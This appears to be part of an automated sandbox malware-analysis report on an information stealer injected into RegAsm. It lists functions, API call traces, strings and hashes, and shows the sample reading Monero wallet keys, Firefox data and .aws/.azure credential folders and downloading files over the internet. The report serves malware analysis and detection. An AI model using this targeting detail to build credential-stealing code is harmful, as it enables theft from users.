                                                                            • Instruction Fuzzy Hash: 8D418071801158ABCB11EBE5DD89EEFBBBDEF4A304F10006EF505A3141EA385A48CBB5
                                                                            Function 00413118 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 116stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0041311D
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                              • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                              • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                              • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                              • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                              • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                              • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                              • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
                                                                            • lstrlenA.KERNEL32(00000000), ref: 004131B6
                                                                              • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
                                                                            • lstrlenA.KERNEL32(00000000), ref: 004131F2
                                                                            • lstrlenA.KERNEL32(00000000), ref: 0041320D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                            • API String ID: 3807055897-1526165396
                                                                            • Opcode ID: 2c86652b872a1e0dadd1c653e9dcbefc8a1b1809ca84a3556183aa192fa2429b
                                                                            • Instruction ID: 62ef994e2eebf51157d4abcec818fbc8b07954dcba3d20b807130a2a391ecf21
                                                                            • Opcode Fuzzy Hash: 2c86652b872a1e0dadd1c653e9dcbefc8a1b1809ca84a3556183aa192fa2429b
                                                                            • Instruction Fuzzy Hash: A341A4B1900258EACB11FFA5D956FDDB7B4AF18708F10017EF90173182DB786B48CA6A
                                                                            Function 0040ED08 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 373COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040ED0D
                                                                            • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED51
                                                                            • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EDC5
                                                                            • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EEE1
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 0040D3FA: _EH_prolog.MSVCRT ref: 0040D3FF
                                                                              • Part of subcall function 0040B8AF: _EH_prolog.MSVCRT ref: 0040B8B4
                                                                            • StrCmpCA.SHLWAPI(00000000), ref: 0040EFB0
                                                                            • StrCmpCA.SHLWAPI(00000000), ref: 0040F025
                                                                            • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040F140
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$lstrcpy
                                                                            • String ID: Stable\$ Stable\$firefox
                                                                            • API String ID: 2120869262-2697854757
                                                                            • Opcode ID: 2d9beafbfaca0d3e469517aa4f8a3f0aacbaa8e1958f816725719b66ff48c97b
                                                                            • Instruction ID: 1f3c50db67794596869caf17774f63c9bcd5449133ce98ec0acc847700032956
                                                                            • Opcode Fuzzy Hash: 2d9beafbfaca0d3e469517aa4f8a3f0aacbaa8e1958f816725719b66ff48c97b
                                                                            • Instruction Fuzzy Hash: 71E19271D00249EADF10FBB9D956BDDBFB4AB09304F10817AE80477682DB78570C8BA6
                                                                            Function 00401C6B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 179stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00401C70
                                                                            • memset.MSVCRT ref: 00401C8E
                                                                              • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                              • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                              • Part of subcall function 00401000: RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                              • Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                            • lstrcat.KERNEL32(?,00000000), ref: 00401CB2
                                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 00401CBF
                                                                            • lstrcat.KERNEL32(?,.keys), ref: 00401CDA
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                              • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                              • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                              • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                              • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                              • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                              • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                            • memset.MSVCRT ref: 00401E9D
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                              • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$lstrcpy$lstrcat$File$AllocCreateHeaplstrlenmemset$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
                                                                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                            • API String ID: 1518627966-218353709
                                                                            • Opcode ID: e9d5ebe04bd7bc58995d170363b86178bbbe3cf24575e7001856d206ab765175
                                                                            • Instruction ID: 901e0a47ee0b89a43ddfaf22904e5be17bd7688e420c1fcef0611cd27edb7556
                                                                            • Opcode Fuzzy Hash: e9d5ebe04bd7bc58995d170363b86178bbbe3cf24575e7001856d206ab765175
                                                                            • Instruction Fuzzy Hash: 06715D71D00248EACB14EBE4D956BDDBBB8AF18308F54407EE505B31C2DE78264CCB69
                                                                            Function 00404DCA Relevance: 15.1, APIs: 10, Instructions: 116networkfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00404DCF
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                              • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                              • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                                                            • StrCmpCA.SHLWAPI(?), ref: 00404E38
                                                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
                                                                            • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                                                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                                                            • InternetCloseHandle.WININET(?), ref: 00404EF2
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
                                                                            • String ID:
                                                                            • API String ID: 2737972104-0
                                                                            • Opcode ID: 88829cdbc13eaa028feb7f2b605196d4632ef8e36c7567f8413ee27c5444be14
                                                                            • Instruction ID: b48a0b941aae4b8094d1842ee2058a608b59a9df84dda5b7ed82bcf6dbc203b8
                                                                            • Opcode Fuzzy Hash: 88829cdbc13eaa028feb7f2b605196d4632ef8e36c7567f8413ee27c5444be14
                                                                            • Instruction Fuzzy Hash: D6413CB1800119AFDB20EBA0DC45FEE7BBDFB45304F10447AFA15B2191D7385A498BA5
                                                                            Function 0041695F Relevance: 11.2, APIs: 5, Strings: 1, Instructions: 654networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00416964
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 004134FD: _EH_prolog.MSVCRT ref: 00413502
                                                                              • Part of subcall function 004135AC: _EH_prolog.MSVCRT ref: 004135B1
                                                                              • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                              • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32(76210000,00416AAC), ref: 00417659
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417670
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417687
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041769E
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176B5
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176CC
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176E3
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004176FA
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417711
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417728
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041773F
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417756
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041776D
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417784
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041779B
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177B2
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177C9
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177E0
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 004177F7
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041780E
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417825
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041783C
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 00417853
                                                                              • Part of subcall function 00417645: GetProcAddress.KERNEL32 ref: 0041786A
                                                                              • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                              • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,5A&6A,?,00426563,00000000,?,00000040,00000064,0041366A,00412D12,?,0000002C,00000064), ref: 00416B55
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0041390C: _EH_prolog.MSVCRT ref: 00413911
                                                                              • Part of subcall function 0041390C: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B5E
                                                                              • Part of subcall function 00413295: _EH_prolog.MSVCRT ref: 0041329A
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416C3A
                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416C56
                                                                              • Part of subcall function 004104DD: _EH_prolog.MSVCRT ref: 004104E2
                                                                              • Part of subcall function 004104DD: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                              • Part of subcall function 004104DD: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                              • Part of subcall function 004104DD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                              • Part of subcall function 004104DD: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                              • Part of subcall function 00403AF5: _EH_prolog.MSVCRT ref: 00403AFA
                                                                              • Part of subcall function 00403AF5: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
                                                                              • Part of subcall function 00403AF5: StrCmpCA.SHLWAPI(?), ref: 00403BBC
                                                                              • Part of subcall function 00411CD8: _EH_prolog.MSVCRT ref: 00411CDD
                                                                              • Part of subcall function 00411CD8: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00416CD7), ref: 00411CFF
                                                                              • Part of subcall function 00411CD8: ExitProcess.KERNEL32 ref: 00411D0A
                                                                              • Part of subcall function 0040ED08: _EH_prolog.MSVCRT ref: 0040ED0D
                                                                              • Part of subcall function 0040ED08: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED51
                                                                              • Part of subcall function 0040ED08: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EDC5
                                                                              • Part of subcall function 0040514C: _EH_prolog.MSVCRT ref: 00405151
                                                                              • Part of subcall function 0040514C: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
                                                                              • Part of subcall function 0040514C: StrCmpCA.SHLWAPI(?), ref: 00405213
                                                                              • Part of subcall function 004117C4: _EH_prolog.MSVCRT ref: 004117C9
                                                                              • Part of subcall function 004117C4: strtok_s.MSVCRT ref: 004117F0
                                                                              • Part of subcall function 004117C4: StrCmpCA.SHLWAPI(00000000,00426518,?,?,?,?,00416EC0), ref: 00411821
                                                                              • Part of subcall function 004117C4: strtok_s.MSVCRT ref: 00411882
                                                                              • Part of subcall function 00401ED6: _EH_prolog.MSVCRT ref: 00401EDB
                                                                              • Part of subcall function 004165D9: _EH_prolog.MSVCRT ref: 004165DE
                                                                              • Part of subcall function 004165D9: lstrcat.KERNEL32(?,00000000), ref: 00416620
                                                                              • Part of subcall function 004165D9: lstrcat.KERNEL32(?), ref: 0041663F
                                                                              • Part of subcall function 00416791: _EH_prolog.MSVCRT ref: 00416796
                                                                              • Part of subcall function 00416791: memset.MSVCRT ref: 004167B6
                                                                              • Part of subcall function 00416791: lstrcat.KERNEL32(?,00000000), ref: 004167DC
                                                                              • Part of subcall function 00416791: lstrcat.KERNEL32(?,\.azure\), ref: 004167F9
                                                                              • Part of subcall function 00416791: memset.MSVCRT ref: 00416834
                                                                              • Part of subcall function 00416791: lstrcat.KERNEL32(?,00000000), ref: 0041685F
                                                                              • Part of subcall function 00416791: lstrcat.KERNEL32(?,\.aws\), ref: 0041687C
                                                                              • Part of subcall function 00416791: memset.MSVCRT ref: 004168B7
                                                                              • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$H_prolog$lstrcat$lstrcpy$InternetOpen$memset$DirectoryHeapProcesslstrlenstrtok_s$AllocCreateExitInformationSystemTimeVolumeWindows
                                                                            • String ID: 5A&6A
                                                                            • API String ID: 1955031769-2983527881
                                                                            • Opcode ID: 2ee3f8b9386a6497ed6ebd3ffcc33a71c189eb79d5fdec20d5bed9e4fc6e3802
                                                                            • Instruction ID: bb05b1d9e7c39d7df88ecf206bceb681005d45f58bf20589137b6770423741ef
                                                                            • Opcode Fuzzy Hash: 2ee3f8b9386a6497ed6ebd3ffcc33a71c189eb79d5fdec20d5bed9e4fc6e3802
                                                                            • Instruction Fuzzy Hash: AC4242B1D00358AADF10EBA5CD46BDEBB78AF15304F5041AEF54573281DB781B888BA7
                                                                            Function 0040618B Relevance: 10.6, APIs: 7, Instructions: 70filememoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00406190
                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                            • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
                                                                            • String ID:
